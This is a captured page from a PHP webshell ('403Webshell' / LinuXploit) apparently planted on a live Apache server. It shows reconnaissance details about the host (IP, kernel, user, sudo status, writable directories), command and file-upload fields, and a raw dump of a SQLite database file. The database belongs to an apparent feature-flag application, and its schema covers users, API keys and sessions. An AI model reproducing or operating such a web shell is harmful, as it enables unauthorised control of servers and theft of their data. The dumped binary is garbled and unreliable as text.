403Webshell
Server IP : 35.80.110.71  /  Your IP : 216.73.216.221
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ip-172-31-21-44 6.17.0-1019-aws #19~24.04.1-Ubuntu SMP Tue Jun 23 18:53:06 UTC 2026 x86_64
User : ubuntu ( 1000)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/splitstream/current/database/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/splitstream/current/database/database.sqlite
SQLite format 3@  99+9.v��1��%


����T���Y!
�
�
�/
c	2026_06_07_201509_create_audit_events_table+[	2026_06_07_201508_create_segments_table2i	2026_06_07_201507_create_targeting_rules_table6
q	2026_06_07_201506_create_flag_configurations_table(	U	2026_06_07_201505_create_flags_table+[	2026_06_07_201504_create_api_keys_table/c	2026_06_07_201503_create_environments_table8u	2026_06_07_201502_create_workspace_memberships_table7s	2026_06_07_201501_add_current_workspace_id_to_users-_	2026_06_07_201500_create_workspaces_table'S	0001_01_01_000002_create_jobs_table(U	0001_01_01_000001_create_cache_table(U	0001_01_01_000000_create_users_table
���users!migrations

























�Y
�Y�
g!�
�x
}	�
F	���O�V!�!Xv;#�indexfailed_jobs_uuid_uniquefailed_jobsCREATE UNIQUE INDEX "failed_jobs_uuid_unique" on "failed_jobs" ("uuid")�5e#�oindexfailed_jobs_connection_queue_failed_at_indexfailed_jobsCREATE INDEX "failed_jobs_connection_queue_failed_at_index" on "failed_jobs" ("connection", "queue", "failed_at")�.##�#tablefailed_jobsfailed_jobsCREATE TABLE "failed_jobs" ("id" integer primary key autoincrement not null, "uuid" varchar not null, "connection" varchar not null, "queue" varchar not null, "payload" text not null, "exception" text not null, "failed_at" datetime not null default CURRENT_TIMESTAMP)5I#indexsqlite_autoindex_job_batches_1job_batches�`##�tablejob_batchesjob_batchesCREATE TABLE "job_batches" ("id" varchar not null, "name" varchar not null, "total_jobs" integer not null, "pending_jobs" integer not null, "failed_jobs" integer not null, "failed_job_ids" text not null, "options" text, "cancelled_at" integer, "created_at" integer not null, "finished_at" integer, primary key ("id"))��etablejobsjobsCREATE TABLE "jobs" ("id" integer primary key autoincrement not null, "queue" varchar not null, "payload" text not null, "attempts" integer not null, "reserved_at" integer, "available_at" integer not null, "created_at" integer not null)E#�#indexcache_locks_expiration_indexcache_locksCREATE INDEX "cache_locks_expiration_index" on "cache_locks" ("expiration")�$##�tablecache_lockscache_locksCREATE TABLE "cache_locks" ("key" varchar not null, "owner" varchar not null, "expiration" integer not null, primary key ("key"))5I#indexsqlite_autoindex_cache_locks_1cache_locksg
9�indexcache_expiration_indexcacheCREATE INDEX "cache_expiration_index" on "cache" ("expiration")��}tablecachecacheCREATE TABLE "cache" ("key" varchar not null, "value" text not null, "expiration" integer not null, primary key ("key")))=indexsqlite_autoindex_cache_1cache
|
E�#indexsessions_last_activity_indexsessionsCREATE INDEX "sessions_last_activity_index" on "sessions" ("last_activity")j	9�indexsessions_user_id_indexsessions
CREATE INDEX "sessions_user_id_index" on "sessions" ("user_id")�W�tablesessionssessionsCREATE TABLE "sessions" ("id" varchar not null, "user_id" integer, "ip_address" varchar, "user_agent" text, "payload" text not null, "last_activity" integer not null, primary key ("id"))/Cindexsqlite_autoindex_sessions_1sessions	�>77�tablepassword_reset_tokenspassword_reset_tokensCREATE TABLE "password_reset_tokens" ("email" varchar not null, "token" varchar not null, "created_at" datetime, primary key ("email"))I]7indexsqlite_autoindex_password_reset_tokens_1password_reset_tokensS-sindexjobs_queue_indexjobsCREATE INDEX "jobs_queue_index" on "jobs" ("queue")P++Ytablesqlite_sequencesqlite_sequenceCREATE TABLE sqlite_sequence(name,seq)�$!!�tablemigrationsmigrationsCREATE TABLE "migrations" ("id" integer primary key autoincrement not null, "migration" varchar not null, "batch" integer not null)
G��b
�bOM�y�@���`W	�	���#�tableapi_keysapi_keys$CREATE TABLE "api_keys" ("id" varchar not null, "workspace_id" varchar not null, "environment_id" varchar, "name" varchar, "kind" varchar not null, "prefix" varchar not null, "key_hash" varchar not null, "last_four" varchar not null, "last_used_at" datetime, "revoked_at" datetime, "created_at" datetime, "updated_at" datetime, foreign key("workspace_id") references "workspaces"("id") on delete cascade, foreign key("environment_id") references "environments"("id") on delete set null, primary key ("id"))/$Cindexsqlite_autoindex_api_keys_1api_keys%�!"U%�Uindexenvironments_workspace_id_key_uniqueenvironments#CREATE UNIQUE INDEX "environments_workspace_id_key_unique" on "environments" ("workspace_id", "key")� %%�ytableenvironmentsenvironments!CREATE TABLE "environments" ("id" varchar not null, "workspace_id" varchar not null, "key" varchar not null, "name" varchar not null, "production" tinyint(1) not null default '0', "require_approval" tinyint(1) not null default '0', "created_at" datetime, "updated_at" datetime, foreign key("workspace_id") references "workspaces"("id") on delete cascade, primary key ("id"))7!K%indexsqlite_autoindex_environments_1environments"�Qo7�	indexworkspace_memberships_workspace_id_user_id_uniqueworkspace_memberships CREATE UNIQUE INDEX "workspace_memberships_workspace_id_user_id_unique" on "workspace_memberships" ("workspace_id", "user_id")�,77�wtableworkspace_membershipsworkspace_membershipsCREATE TABLE "workspace_memberships" ("id" varchar not null, "workspace_id" varchar not null, "user_id" integer not null, "role" varchar not null default 'member', "created_at" datetime, "updated_at" datetime, foreign key("user_id") references "users"("id") on delete cascade, foreign key("workspace_id") references "workspaces"("id") on delete cascade, primary key ("id"))I]7indexsqlite_autoindex_workspace_memberships_1workspace_memberships�a1�indexusers_email_uniqueusersCREATE UNIQUE INDEX "users_email_unique" on "users" ("email")��	�qtableusersusersCREATE TABLE "users" ("id" integer primary key autoincrement not null, "name" varchar not null, "email" varchar not null, "email_verified_at" datetime, "password" varchar not null, "remember_token" varchar, "created_at" datetime, "updated_at" datetime, "current_workspace_id" varchar, foreign key("current_workspace_id") references "workspaces"("id") on delete set null)r9!�indexworkspaces_slug_uniqueworkspacesCREATE UNIQUE INDEX "workspaces_slug_unique" on "workspaces" ("slug")3G!indexsqlite_autoindex_workspaces_1workspaces�F!!�WtableworkspacesworkspacesCREATE TABLE "workspaces" ("id" varchar not null, "name" varchar not null, "slug" varchar not null, "created_at" datetime, "updated_at" datetime, primary key ("id"))�%Y�Qindexapi_keys_workspace_id_revoked_at_indexapi_keys&CREATE INDEX "api_keys_workspace_id_revoked_at_index" on "api_keys" ("workspace_id", "revoked_at")


















	k�
�
c�
�
�	�!�y����k�-7a%�aindexaudit_events_subject_type_subject_id_indexaudit_events9CREATE INDEX "audit_events_subject_type_subject_id_index" on "audit_events" ("subject_type", "subject_id")�-6a%�aindexaudit_events_workspace_id_created_at_indexaudit_events8CREATE INDEX "audit_events_workspace_id_created_at_index" on "audit_events" ("workspace_id", "created_at")�^4%%�tableaudit_eventsaudit_events6CREATE TABLE "audit_events" ("id" varchar not null, "workspace_id" varchar not null, "actor_type" varchar not null, "actor_id" varchar, "actor_label" varchar, "subject_type" varchar not null, "subject_id" varchar not null, "action" varchar not null, "diff" text not null, "reason" text, "created_at" datetime not null default CURRENT_TIMESTAMP, foreign key("workspace_id") references "workspaces"("id") on delete cascade, primary key ("id"))75K%indexsqlite_autoindex_audit_events_1audit_events7�3M�Eindexsegments_workspace_id_key_uniquesegments5CREATE UNIQUE INDEX "segments_workspace_id_key_unique" on "segments" ("workspace_id", "key")�\1�tablesegmentssegments3CREATE TABLE "segments" ("id" varchar not null, "workspace_id" varchar not null, "key" varchar not null, "name" varchar not null, "description" text, "condition" text not null, "created_at" datetime, "updated_at" datetime, foreign key("workspace_id") references "workspaces"("id") on delete cascade, primary key ("id"))/2Cindexsqlite_autoindex_segments_1segments4�N0u+�	indextargeting_rules_flag_configuration_id_priority_indextargeting_rules2CREATE INDEX "targeting_rules_flag_configuration_id_priority_index" on "targeting_rules" ("flag_configuration_id", "priority")=/Q+indexsqlite_autoindex_targeting_rules_1targeting_rules0�.++�ctabletargeting_rulestargeting_rules/CREATE TABLE "targeting_rules" ("id" varchar not null, "flag_configuration_id" varchar not null, "priority" integer not null, "description" varchar, "condition" text not null, "variation" text not null, "created_at" datetime, "updated_at" datetime, foreign key("flag_configuration_id") references "flag_configurations"("id") on delete cascade, primary key ("id"))�O-o3�	indexflag_configurations_flag_id_environment_id_uniqueflag_configurations.CREATE UNIQUE INDEX "flag_configurations_flag_id_environment_id_unique" on "flag_configurations" ("flag_id", "environment_id")E,Y3indexsqlite_autoindex_flag_configurations_1flag_configurations-�!+33�itableflag_configurationsflag_configurations,CREATE TABLE "flag_configurations" ("id" varchar not null, "flag_id" varchar not null, "environment_id" varchar not null, "state" varchar not null default 'off', "variation" text not null, "bucketing_attribute" varchar not null default 'userId', "bucketing_seed" varchar not null, "created_at" datetime, "updated_at" datetime, foreign key("flag_id") references "flags"("id") on delete cascade, foreign key("environment_id") references "environments"("id") on delete cascade, primary key ("id"))j*;�indexflags_archived_at_indexflags+CREATE INDEX "flags_archived_at_index" on "flags" ("archived_at")�)G�9indexflags_workspace_id_key_uniqueflags*CREATE UNIQUE INDEX "flags_workspace_id_key_unique" on "flags" ("workspace_id", "key"))(=indexsqlite_autoindex_flags_1flags)�o'�=tableflagsflags(CREATE TABLE "flags" ("id" varchar not null, "workspace_id" varchar not null, "key" varchar not null, "type" varchar not null, "description" text, "default_value" text not null, "archived_at" datetime, "created_at" datetime, "updated_at" datetime, foreign key("workspace_id") references "workspaces"("id") on delete cascade, primary key ("id"))v&=�indexapi_keys_key_hash_uniqueapi_keys'CREATE UNIQUE INDEX "api_keys_key_hash_unique" on "api_keys" ("key_hash")









Youez - 2016 - github.com/yon3zu
LinuXploit